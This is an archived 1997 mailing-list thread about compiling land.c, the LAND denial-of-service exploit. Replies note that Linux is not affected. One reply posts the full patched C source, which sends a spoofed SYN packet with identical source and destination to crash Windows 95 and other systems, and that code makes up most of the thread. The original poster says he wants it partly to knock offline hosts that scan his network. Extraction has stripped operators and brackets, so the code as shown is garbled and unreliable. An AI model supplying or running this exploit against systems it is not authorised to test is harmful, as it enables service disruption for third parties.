Re: Compiling land.c
Why you need to compile this program? Because I have a bunch of FreeBSD boxes that I need to make sure are no longer vulnerable, and because I want a way of taking down boxes which insist on aggressivly strobing our network and setting off my pager :) If you want to find out whether your linux is vulnerable, just upgrade you linux to 2.0.32. That's Teardrop and the Pentium f00f bug... linux isn't vulnerable to this attack. Adam. Internet Alaska -- 4050 Lake Otis Adam Shand(v) +1 907 562 4638 Anchorage, Alaska Systems Administrator (f) +1 907 562 1677 - http://larry.earthlight.co.nz --- -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Re: Compiling land.c
The publichsed land.c doesn't compile cleanly with libc6 under linux. It's just a trivial job patching it to work right; here's the fixed source code: Thanks kindly, I figured that's what it was (eventually) but my C skills are not that good unfortunately. Thanks for the code. Adam. Internet Alaska -- 4050 Lake Otis Adam Shand(v) +1 907 562 4638 Anchorage, Alaska Systems Administrator (f) +1 907 562 1677 - http://larry.earthlight.co.nz --- -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Compiling land.c
Hey, Hopefully a quick question. I'm trying to compile land.c (as in the exploit) and it bombs out on me because it can't find netinet/ip_tcp.h and netinet/protocols.h. I've searched my hard drive and I don't have these files anywhere (and I have kernel sources installed and most of the -dev packages) and I would like to get this compiled. Can someone point me to the right place? Thanks, Adam. -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Re: Compiling land.c
Adam Shand wrote: Hey, Hopefully a quick question. I'm trying to compile land.c (as in the exploit) and it bombs out on me because it can't find netinet/ip_tcp.h and netinet/protocols.h. Why you need to compile this program? If you want to find out whether your linux is vulnerable, just upgrade you linux to 2.0.32. Lawrence -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Re: Compiling land.c
Lawrence [EMAIL PROTECTED] writes: Adam Shand wrote: Hey, Hopefully a quick question. I'm trying to compile land.c (as in the exploit) and it bombs out on me because it can't find netinet/ip_tcp.h and netinet/protocols.h. Why you need to compile this program? If you want to find out whether your linux is vulnerable, just upgrade you linux to 2.0.32. BTW, linux is NOT vulnerable to this attack. Even version 1.2.13. see http://www.netspace.org/cgi-bin/wa?A2=ind9711dL=bugtraqO=TP=1541 for a complete list of vulnerable systems. It includes *BSD, NT, SCO, SunOS but not solaris -- Alair Pereira do Lago [EMAIL PROTECTED] http://www.ime.usp.br/~alair Computer Science Department -- Universidade de S~ao Paulo -- Brazil -- TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to [EMAIL PROTECTED] . Trouble? e-mail to [EMAIL PROTECTED] .
Re: Compiling land.c
I'm trying to compile land.c (as in the exploit) ...
Why you need to compile this program?
BTW, linux is NOT vulnerable to this attack. Even version 1.2.13.
Kudos to Linux!!!
Makes me proud!
Later,
Kevin
--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to
[EMAIL PROTECTED] .
Trouble? e-mail to [EMAIL PROTECTED] .
Re: Compiling land.c
I'm trying to compile land.c (as in the exploit) ...
Why you need to compile this program?
BTW, linux is NOT vulnerable to this attack. Even version 1.2.13.
Kudos to Linux!!!
Makes me proud to be a Linux user/supporter
Later,
Kevin
--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to
[EMAIL PROTECTED] .
Trouble? e-mail to [EMAIL PROTECTED] .
Re: Compiling land.c
And thus spake Adam Shand, on Thu, Nov 27, 1997 at 01:07:53AM -0900:
Hopefully a quick question. I'm trying to compile land.c (as in the
exploit) and it bombs out on me because it can't find netinet/ip_tcp.h and
netinet/protocols.h.
I've searched my hard drive and I don't have these files anywhere (and I
have kernel sources installed and most of the -dev packages) and I would
like to get this compiled.
Can someone point me to the right place?
The publichsed land.c doesn't compile cleanly with libc6 under linux.
It's just a trivial job patching it to work right; here's the fixed
source code:
/* land.c by m3lt, FLC
crashes a win95 box */
/* patched for linux/libc6+debian */
#include stdio.h
#include netdb.h
#include arpa/inet.h
#include netinet/in.h
#include sys/types.h
#include sys/socket.h
#include netinet/ip.h
#define __FAVOR_BSD
#include netinet/tcp.h
struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
for(i=0;i(length1);i++)
value+=data[i];
if((length1)==1)
value+=(data[i]8);
value=(value65535)+(value16);
return(~value);
}
int main(int argc,char * * argv)
{
struct sockaddr_in sin;
struct hostent * hoste;
int sock;
char buffer[40];
struct iphdr * ipheader=(struct iphdr *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct
iphdr));
struct pseudohdr pseudoheader;
fprintf(stderr,land.c by m3lt, FLC\n);
if(argc3)
{
fprintf(stderr,usage: %s IP port\n,argv[0]);
return(-1);
}
bzero(sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;
if((hoste=gethostbyname(argv[1]))!=NULL)
bcopy(hoste-h_addr,sin.sin_addr,hoste-h_length);
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
{
fprintf(stderr,unknown host %s\n,argv[1]);
return(-1);
}
if((sin.sin_port=htons(atoi(argv[2])))==0)
{
fprintf(stderr,unknown port %s\n,argv[2]);
return(-1);
}
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
fprintf(stderr,couldn't allocate raw socket\n);
return(-1);
}
bzero(buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader-version=4;
ipheader-ihl=sizeof(struct iphdr)/4;
ipheader-tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader-id=htons(0xF1C);
ipheader-ttl=255;
ipheader-protocol=IPPROTO_TCP;
ipheader-saddr=sin.sin_addr.s_addr;
ipheader-daddr=sin.sin_addr.s_addr;
tcpheader-th_sport=sin.sin_port;
tcpheader-th_dport=sin.sin_port;
tcpheader-th_seq=htonl(0xF1C);
tcpheader-th_flags=TH_SYN;
tcpheader-th_off=sizeof(struct tcphdr)/4;
tcpheader-th_win=htons(2048);
bzero(pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) pseudoheader.tcpheader,sizeof(struct
tcphdr));
tcpheader-th_sum=checksum((u_short *) pseudoheader,12+sizeof(struct
tcphdr));
if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct
tcphdr),0,(struct sockaddr *) sin,sizeof(struct sockaddr_in))==-1)
{
fprintf(stderr,couldn't send packet\n);
return(-1);
}
fprintf(stderr,%s:%s landed\n,argv[1],argv[2]);
close(sock);
return(0);
}
--
Elie Rosenblum [EMAIL PROTECTED] That is not dead which can eternal lie,
[EMAIL PROTECTED] And with strange aeons even death may die.
Developer / Mercenary / System Administrator - _The Necromicon_
--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word unsubscribe to
[EMAIL PROTECTED] .
Trouble? e-mail to [EMAIL PROTECTED] .
